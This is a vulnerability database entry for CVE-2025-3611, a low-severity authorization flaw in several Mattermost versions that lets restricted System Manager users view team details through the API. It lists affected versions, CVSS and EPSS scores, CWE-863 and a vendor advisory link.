CVE-2025-3611

LOW

Mattermost 9.11.0-9.11.12 10.5.0-10.5.3 10.7.0 - Authenticated Incorrect Authorization via Team API Endpoint

Title source: llm

Description

Mattermost versions 10.7.x <= 10.7.0, 10.5.x <= 10.5.3, 9.11.x <= 9.11.12 fails to properly enforce access control restrictions for System Manager roles, allowing authenticated users with System Manager privileges to view team details they should not have access to via direct API requests to team endpoints, even when explicitly configured with 'No access' to Teams in the System Console.

References (1)

Core 1

Core References

Vendor Advisory

https://mattermost.com/security-updates

Scores

CVSS v3 3.1

EPSS 0.0014

EPSS Percentile 33.3%

Attack Vector NETWORK

CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:U/C:L/I:N/A:N

CISA SSVC

Vulnrichment

Exploitation none

Automatable no

Technical Impact partial

Details

CWE

CWE-863

Status published

Products (3)

mattermost/mattermost 10.6.0-rc1 - 10.7.1Go

mattermost/mattermost_server 10.7.0 (3 CPE variants)

mattermost/mattermost_server 9.11.0 - 9.11.13

Published May 30, 2025

Tracked Since Feb 18, 2026